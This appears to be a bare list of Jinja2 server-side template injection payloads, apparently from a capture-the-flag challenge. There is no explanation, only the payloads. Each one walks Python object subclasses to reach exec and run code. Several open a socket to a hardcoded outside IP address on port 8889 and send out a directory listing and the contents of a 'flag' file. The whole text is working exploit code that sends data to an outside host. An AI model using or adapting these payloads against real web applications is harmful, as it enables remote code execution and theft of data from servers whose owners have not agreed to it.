18.223.208.176

{{ ().__class__.__base__.__subclasses__()[794].__len__.__globals__['__builtins__']['exec']('a = 1; ') }}


{{ ().__class__.__base__.__subclasses__()[794].__len__.__globals__['__builtins__']['exec']('import socket; s=socket.socket(); s.connect(("18.223.208.176",8889))') }}


```````````

{{ ().__class__.__base__.__subclasses__()[794].__len__.__globals__['__builtins__']['exec']('import socket; import os; s = socket.socket(); s.connect(("18.223.208.176",8889)); s.sendall(str([i for i in os.walk(".")]).encode("utf8"))') }}

{{ ().__class__.__base__.__subclasses__()[794].__len__.__globals__['__builtins__']['exec']('import socket; s = socket.socket(); s.connect(("18.223.208.176",8889)); s.sendall( open("flag","rb").read() )') }}

{{ ().__class__.__base__.__subclasses__()[414].__len__.__globals__['__builtins__']['exec']('import socket; s = socket.socket()') }}